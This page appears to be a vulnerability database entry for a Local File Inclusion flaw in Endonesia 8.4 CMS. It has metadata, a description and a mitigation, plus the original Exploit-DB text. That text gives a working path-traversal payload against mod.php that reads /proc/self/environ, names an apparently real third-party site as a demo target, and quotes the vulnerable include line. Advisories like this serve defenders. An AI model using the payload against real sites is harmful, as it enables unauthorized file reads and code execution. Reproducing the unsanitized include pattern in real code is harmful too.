Endonesia 8.4 CMS Local File Inclusion Vulnerability

vendor:

Endonesia 8.4 CMS

by:

s4r4d0

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Endonesia 8.4 CMS

Affected Version From: 8.4

Affected Version To: 8.4

Patch Exists: YES

Related CWE: N/A

CPE: a:endonesia:endonesia:8.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Endonesia 8.4 CMS Local File Inclusion Vulnerability

Endonesia 8.4 CMS is vulnerable to Local File Inclusion due to a lack of proper sanitization of user-supplied input in the mod.php file. An attacker can exploit this vulnerability by sending a crafted HTTP request with a maliciously crafted mod parameter. This can allow an attacker to read arbitrary files on the server, such as /etc/passwd, or execute arbitrary code.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in the mod.php file.

Source

Exploit-DB raw data:

[*] Endonesia 8.4 CMS
[*] Site: http://www.endonesia.org/
[*] Download: http://sourceforge.net/projects/endonesia
[*] Bug: Local File Inclusion in mod.php file !
[*] Author: s4r4d0
[*] Mail: s4r4d0@yahoo.com
[*] Team: Fatal Error
[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] SecurityReason Note :
#
# Vulnerable Code in mod.php :
#
# include("./mod/$mod/index.php");
#
# magic_quotes = Off
#
# - sp3x
#
[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !
[*] Made in Brazil
[*] Reference: http://securityreason.com/exploitalert/7435